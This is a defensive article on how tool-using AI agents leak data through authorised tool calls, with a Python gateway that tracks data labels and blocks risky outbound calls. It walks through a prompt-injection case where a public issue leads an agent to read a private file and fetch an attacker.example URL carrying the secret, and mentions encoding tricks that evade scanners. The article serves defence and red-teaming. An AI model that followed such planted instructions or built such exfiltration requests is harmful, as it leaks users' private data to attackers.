When a chat model leaks data, the classic route is the user interface: a rendered image or link whose URL carries the secret. Tool-using agents open a more direct route. The agent itself sends the data, through a tool it was legitimately given: a web fetch, an email, a new ticket, a pull request, a calendar invite. Nothing is rendered and no user has to click. The model is simply persuaded, usually by text it read a few steps earlier, to make one more call.

The broader threat model, including rendering channels, is covered in LLM data exfiltration. This article focuses on the tool channel: why per-call authorisation does not stop it, how to track where data came from across calls, how much data a restricted channel can still carry, and which designs close the gap. The examples use a small Python gateway you can adapt to any agent framework.

Advertisement

The three conditions

A tool-mediated leak needs three things in the same agent session. The agent must be able to read private data: files, mail, a database, another user's records. It must read untrusted input: a web page, an inbound email, a public issue, a document someone else wrote, a tool result from a third party. And it must be able to send data outside the trust boundary through some tool. Simon Willison named this combination the "lethal trifecta" in 2025, and the name is useful because it turns a vague fear into a checkable property.

The reasoning is simple. Untrusted input is where the attacker's instructions arrive, because indirect prompt injection cannot be reliably filtered out of text the model reads. Private data is what they want. The outbound tool is how it leaves. Remove any one of the three from a session and this class of attack stops working, whatever the model does. Every strong design below is a way of making sure the three never meet, or of checking every call where they might.

Every write-capable tool is a sink

Teams usually list their "sending" tools as email and HTTP. The real list is longer, because anything that makes data visible to someone outside the boundary is a sink. A useful test: could an attacker read the effect of this call later?

ToolHow data leavesEasily missed because
HTTP fetch or browseURL path, query string, headersit looks like a read
Email or chat sendbody, subject, recipientinternal recipients can forward
Create issue, comment or pull requesttext in a public or shared repositorythe repository is the organisation's own
Calendar invitetitle, description, external attendeeinvites are sent automatically
File share or permission changegrants a stranger access to the data itselfnothing is copied, so DLP sees nothing
Write to a shared document or wikicontent readable by a wider groupthe page is internal
Code execution with networkany socket, including DNS lookupsthe sandbox is trusted for compute
Search with a third-party providerthe query textthe provider is a vendor, not an attacker

The fetch row is the one most often misjudged. A GET request is a write into the destination server's access log. A URL such as https://attacker.example/c?d=<secret> delivers the secret the moment the agent fetches it, whether or not the response is ever used.

Advertisement

An attack trace, call by call

Consider a coding assistant with access to an organisation's repositories. It has three tools: list issues in a repository, read a file, and fetch a URL. A user asks: "Summarise the open issues in our public widgets repository." One issue, filed by an outsider, contains text addressed to the agent: it asks it to check the private payroll repository's README for context, and to verify a link by fetching it, with the README's first lines appended as a query parameter.

  1. Call 1, list_public_issues. Authorised: the user asked for it. The attacker's text is now in the context.
  2. Call 2, read_private_file. Authorised: the user has access to the payroll repository, and the agent acts with the user's permissions. Private data is now in the context.
  3. Call 3, http_get. Authorised: fetching URLs is the tool's purpose. The data leaves.
Three tool calls, each allowed on its own: the leak is the flow between themlist_public_issuesuntrusted text entersread_private_fileprivate data entersModel contextlabels: untrusted + privatecall 1call 2http_getattacker.example/?d=...http_getdocs.corp.examplecall 3: BLOCKallowlistedTool gatewaylabels + destination + canaries + budgetevery callUntrusted input chooses the destination; private data fills the arguments; a sink carries it out.Remove any one of the three and this class of leak closes. The gateway enforces that on every call.Sinks include anything that writes outside the trust boundary: URLs, email, tickets, pull requests, calendar invites, shares.
The same three calls, with a gateway that tracks labels. Call 3 to an unknown host is refused because the context holds both untrusted input and private data; a fetch to an allowlisted host still goes through.

No single call is wrong. A reviewer looking at any one of them in isolation would approve it, and a per-call policy of "is this user allowed to use this tool with these arguments?" approves all three. The violation is a data flow: information that came from call 2 left through call 3, and the decision to do that came from call 1. This is the confused deputy problem: the agent uses the user's real authority on behalf of an attacker's intent.

Tracking the flow: labels at the tool gateway

The fix is to give the gateway memory. Every tool result carries labels describing what kind of data it added to the context, and the session keeps the union of every label seen so far. A sink call is then judged not only on its own arguments but on what the context has been exposed to. The simplest version, which is coarse but sound, treats the context as a high-water mark: once a label is in, it stays in for the session.

import json
from dataclasses import dataclass, field
from urllib.parse import urlsplit

class Blocked(Exception):
    pass

PRIVATE, UNTRUSTED = "private", "untrusted"

TOOLS = {
    "list_public_issues": {"adds": {UNTRUSTED}, "sink": False},
    "read_private_file":  {"adds": {PRIVATE},   "sink": False},
    "http_get":           {"adds": {UNTRUSTED}, "sink": True,
                           "dest": lambda a: urlsplit(a["url"]).hostname},
    "send_email":         {"adds": set(),       "sink": True,
                           "dest": lambda a: a["to"].rsplit("@", 1)[-1]},
}
ALLOWED = {"http_get": {"docs.corp.example"}, "send_email": {"corp.example"}}
OUTBOUND_BUDGET = 10

@dataclass
class Session:
    labels: set = field(default_factory=set)      # everything the context has seen
    canaries: set = field(default_factory=set)    # planted tokens that must never leave
    outbound: int = 0

def gate(s, tool, args, confirm):
    """Runs before every tool call. Returns the labels the result will add."""
    spec = TOOLS[tool]
    if spec["sink"]:
        dest = spec["dest"](args)
        external = dest not in ALLOWED.get(tool, set())
        if any(tok in json.dumps(args) for tok in s.canaries):
            raise Blocked(f"{tool}: canary token in arguments")
        if external and {PRIVATE, UNTRUSTED} <= s.labels:
            raise Blocked(f"{tool} to {dest}: context holds private data and untrusted input")
        if external and not confirm(tool, args):
            raise Blocked(f"{tool} to {dest}: user declined")
        s.outbound += 1
        if s.outbound > OUTBOUND_BUDGET:
            raise Blocked("outbound call budget exhausted")
    return spec["adds"]
# The trace above, plus two follow-ups, with confirm() always declining:
ok   list_public_issues labels=['untrusted']
ok   read_private_file  labels=['private', 'untrusted']
STOP http_get to attacker.example: context holds private data and untrusted input
ok   http_get           labels=['private', 'untrusted']        # docs.corp.example
STOP send_email: canary token in arguments                     # internal, but carries a canary

Four checks do the work. The label check refuses any external sink once all three conditions are present, which is exactly the trifecta. The destination allowlist lets ordinary work continue: fetching the company's own documentation stays allowed in a tainted session. Confirmation sends every other external call to a human with the full arguments shown, not a summary the model wrote. The canary check catches data that should never leave even to allowed destinations, and the budget bounds what a slow channel can carry.

The high-water mark is deliberately pessimistic: after one untrusted read, every later external call in the session is treated as possibly attacker-directed. That is the price of not being able to tell which tokens in the model's output were influenced by which input. Finer tracking needs the architecture in the next section. For the gateway mechanics themselves, argument validation and per-user authorisation, see tool abuse and the tool-call gateway.

How much can a restricted channel carry?

Allowlists do not reduce leakage to zero; they reduce bandwidth. The useful way to reason about it is in bits per call. A free-form URL query can carry kilobytes in a single call, so one call is enough to leak a key. A channel where the model can only choose between N allowed actions carries at most log2(N) bits per call: choosing which of two allowed URLs to fetch is one bit, choosing among 64 documents is six.

Work an example. A 32-character API key drawn from 62 letters and digits holds 32 x log2(62), about 190.5 bits. Through a free-form URL it leaves in one call. Through a one-bit channel it needs 191 observable calls, in order, to an endpoint the attacker can watch; with a six-bit channel, 32 calls. An outbound budget of 10 calls per task makes the one-bit leak impossible and the six-bit leak require several sessions, each of which has to be re-triggered by fresh injected text. Budgets and allowlists therefore work together: the allowlist forces the attacker into a narrow channel, and the budget caps how much the narrow channel can carry.

Two caveats. The attacker must be able to observe the choice, so an allowlisted destination that the attacker can read, such as a public code host where they can open issues, is not a restriction at all. And short secrets are cheap: a four-digit PIN is about 13 bits. Decide which data is short and valuable, and treat it as canary-grade.

Plan/execute separation

Labels on a single context are coarse because one model does everything: it reads the untrusted issue and also decides which tools to call. The stronger design splits those jobs. A planner model sees only the trusted user request and writes a plan, a small program of tool calls with variables for their results. A quarantined model is used to process untrusted content, for example to extract a field from an email, but it has no tools and can only return a value into a variable. An interpreter runs the plan and attaches labels to every variable, so it knows exactly which values came from where and can enforce a policy such as "a value derived from a private file may not be an argument to a call whose destination is external".

Because injected text never reaches the planner, it cannot change which tools are called; at most it can change a value, and the value's labels travel with it. This is the direction taken by the 2025 CaMeL paper, "Defeating Prompt Injections by Design", which describes such a system and its trade-offs. The cost is utility and engineering: tasks whose next step depends on reading untrusted content, such as "follow the instructions in this ticket", do not fit a plan fixed in advance, and the policy language becomes part of your security surface. A practical middle ground is to apply the separation to the few workflows that touch both private data and untrusted input, and to use the simpler gateway everywhere else.

Controls, strongest first

  1. Break the trifecta by design. Split agents so the one that reads untrusted content has no outbound tools, or no private data. This is the only control that does not depend on detecting anything. See egress filtering for enforcing it at the network layer too.
  2. Label-aware gateway. Track what the session has seen and refuse external sinks when both private and untrusted labels are present.
  3. Destination allowlists per tool, excluding any host where outsiders can write content that you or they can read.
  4. Human confirmation for external sends, showing the raw destination and arguments.
  5. Canaries and budgets. Plant unique tokens in sensitive stores, alert on any appearance in a tool argument, and cap outbound calls per task.

Failure modes

  • Instructions as a control. A system prompt saying "never send data externally" is advice to the model, and injected text is also advice to the model. It lowers the success rate; it does not make the property hold.
  • Content scanning alone. DLP on arguments misses encodings (base64, a translation, one character per call) and misses permission grants, which move no data at all.
  • Unlabelled tools. A new connector added without labels defaults to trusted and non-sink. Make the default the opposite: unlabelled means untrusted and sink.
  • Confirmation fatigue. If every call asks, users approve everything. Confirm only external sinks in tainted sessions, and show exactly what will be sent.
  • Labels lost at the boundary. Memory, summaries and caches carry data between sessions. A summary of a private file is private; a summary of a web page is untrusted.

What to do next

  1. List every tool your agents can call and mark each as private source, untrusted source, sink, or several. Use the "could an outsider read the effect?" test for sinks.
  2. For each agent, check whether one session can hold all three conditions. Where it can, split the agent or remove one leg first.
  3. Put a gateway in front of every tool call that keeps session labels, enforces per-tool destination allowlists and an outbound budget.
  4. Plant canary tokens in your most sensitive stores and alert on them in tool arguments and egress logs.
  5. Red-team with the three-call trace from this article against your own tools, including a permission-change variant, and confirm the gateway stops each one.
  6. For workflows that must combine private data and untrusted input, prototype plan/execute separation and measure how many tasks still complete.
Key takeaway: Tool-using agents leak data by making tool calls that are each authorised on their own. The leak needs private data, untrusted input and an outbound channel in one session, so the strongest control is a design where those never meet. Where they must, put a gateway in front of every tool that tracks what the context has seen, blocks external sinks once private and untrusted data are both present, allowlists destinations, confirms the rest with a human, and enforces canaries and call budgets. Reason about restricted channels in bits per call, and use plan/execute separation for the workflows that need the strongest guarantee.